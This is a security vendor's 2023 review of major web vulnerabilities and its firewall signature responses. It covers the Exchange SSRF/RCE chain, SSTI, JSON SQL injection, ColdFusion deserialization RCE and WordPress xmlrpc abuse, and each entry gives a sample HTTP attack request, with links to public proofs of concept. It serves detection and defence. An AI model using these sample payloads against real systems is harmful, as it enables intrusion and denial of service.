Major Vulnerabilities and Signature Pattern Response in 2023

1. Overview :
   MONITORAPP's web firewall prevents and blocks attacks on web applications by integrating various security technologies. These technologies identify major vulnerabilities and provide effective responses to maintain the integrity and availability of web applications. To enhance the security of web applications, regularly updated signature patterns quickly detect and block various web attacks, serving as essential components. By using predefined signature patterns, quick responses are enabled, thus enhancing the stability of web applications.

While the security landscape continues to evolve and more sophisticated threats emerge, the transition to proactive security is inevitable. Traditional signature patterns remain vital security elements, offering high reliability and robust detection capabilities, playing a crucial role in current security strategies.

To address known and unknown threats in the security environment, it is important to harmonize intelligent and innovative technologies like artificial intelligence, big data, with traditional stability provided by signature patterns. These two security elements complement each other, contributing to overall security reinforcement.

In 2023, the threat analysis team investigated and analyzed particularly noteworthy vulnerabilities among various cyber threats occurring globally. This process yielded results for a swift and effective response. Below are the major vulnerabilities that garnered attention this year.

2. Major Vulnerabilities in 2023 :

2-1) MS Exchange Server Vulnerability where low-privileged users can access MS Exchange Server's PowerShell through various methods to upload and execute WebShells.

CVE-2022-41080: SSRF Vulnerability Attack Vulnerability occurs during the interpretation of the attacker's payload in the Front-End (HTTP Proxy) process.

CVE-2022-41082: RCE Vulnerability Attack Vulnerability occurs during the deserialization of the attacker's payload in the Back-End (Remote PowerShell) process.

Sample Attack Syntax and Detection

POST /autodiscover/admin@localhost/powershell/autodiscover.json?x=a HTTP/1.1
Authorization: Basic cG9jdXNlcjpwb2NwYXNzd29yZA==
Content-Length: 1821
Content-Type: application/soap+xml;charset=utf-8
Host: www.sample.com
User-Agent: HTTPie

<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
	<s:Header>
		<a:To>https://exchange16.domaincorp.com:443/PowerShell?PSVersion=5.1.19041.610</a:To>
		<w:ResourceURI s:mustUnderstand="true">http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI>
		<a:ReplyTo>
			<a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
		</a:ReplyTo>
		<a:Action s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Create</a:Action>
		<w:MaxEnvelopeSize s:mustUnderstand="true">512000</w:MaxEnvelopeSize>
		<a:MessageID>uuid:{MessageID}</a:MessageID>
		<w:Locale xml:lang="en-US" s:mustUnderstand="false" />
		<p:DataLocale xml:lang="en-US" s:mustUnderstand="false" />
		<p:SessionId s:mustUnderstand="false">uuid:ddedca29-086e-4053-a983-0e00fa367968</p:SessionId>
		<p:OperationID s:mustUnderstand="false">uuid:4bbdc4fa-7040-4697-93f3-179f7108c8e8</p:OperationID>
		<p:SequenceId s:mustUnderstand="false">1</p:SequenceId>
		<w:OptionSet xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" s:mustUnderstand="true">
		
			<w:Option Name="protocolversion" MustComply="true">2.3</w:Option>
		</w:OptionSet>
		<w:OperationTimeout>PT180.000S</w:OperationTimeout>
	</s:Header>
	<s:Body>
		<rsp:Shell xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" Name="WinRM10" >
			<rsp:InputStreams>stdin pr</rsp:InputStreams>
			<rsp:OutputStreams>stdout</rsp:OutputStreams>
			<creationXml xmlns="http://schemas.microsoft.com/powershell">AAAAAAAAAAAAAASASDASDASASDSFASFASFDFADSKLJlkjlkjKLJSL...</creationXml>
		</rsp:Shell>
	</s:Body>
</s:Envelope>

2-2) Server Side Template Injection Vulnerability where malicious template syntax is inserted and executed in the web template engine applied to the web application.

Method to Confirm Template Engine: Attempt injection attacks using syntax appropriate for each engine.

Sample Attack Syntax and Detection

POST /test HTTP/1.1
Host: www.sample.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Query/Payload Length >= 10

Example
id=${{ "7"*7 }}&password=example

2-3) JSON Operator SQL Injection SQL injection vulnerability exploiting various DBMS's JSON data-related operators or functions added to them.

Support for JSON by DBMS

Since the functions and operators used vary for each DBMS, attacks should be attempted according to the specific features of each database management system.

Sample Attack Syntax and Detection

POST /test HTTP/1.1
Host: www.sample.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Query/Payload Length >= 10

Example
/test?temp=test' or json_array_length({}) <= 3

2-4) Adobe ColdFusion RCE vulnerability caused by unsafe deserialization vulnerability in Adobe ColdFusion product

Vulnerability Attack The attack involves planting a malicious Java class file in a known location and triggering the execution of that file by requesting the CFC endpoint.

Sample Attack Syntax and Detection

POST /testing.cfc?method=foo&_cfclient=true HTTP/1.1
Accept: */*
Connection: close
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
Host: 10.0.0.225:8080
User-Agent: HTTPie

_variables={"_metadata":{"classname":"\..\runtime\work\Catalina\localhost\tmp\hax.tmp"}, "_variables":{}"}

2-5) WordPress xmlrpc.php Vulnerabilities arising from pingback and brute-force attacks through WordPress's xmlrpc.php.

pingback: DoS attacks utilizing the pingback functionality after verifying the port.

brute-force: indiscriminate login attempts or password guessing attack.

Sample Attack Syntax and Detection

POST /xmlrpc.php HTTP/1.1
Content-Length: 258
Content-Type: application/xml; charset=utf-8
Host: xxx.com
User-Agent: HTTPie

<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>https://victim.com</string></value></param><param><value><string>http://xxx/sample-page/</string></value></param></params></methodCall>

3. Reference

• https://nsfocusglobal.com/exchange-server-owassrf-vulnerability-cve-2022-41080-cve-2022-41082-alert/
• https://github.com/ohnonoyesyes/CVE-2022-41080
• https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41082
• https://www.exploit-db.com/exploits/46386
• https://www.opencve.io/cve/CVE-2019-8341
• https://www.bleepingcomputer.com/news/security/hackers-breach-us-govt-agencies-using-adobe-coldfusion-xploit/
• https://www.cisa.gov/news-events/alerts/2023/12/05/cisa-releases-advisory-threat-actors-exploiting-cve-2023-26360-vulnerability-adobe-coldfusion
• https://www.picussecurity.com/resource/blog/cve-2023-26360-adobe-coldfusion-servers-exploited-for-initial-access
• https://www.exploit-db.com/exploits/43829
• https://github.com/nth347/CVE-2020-28032_PoC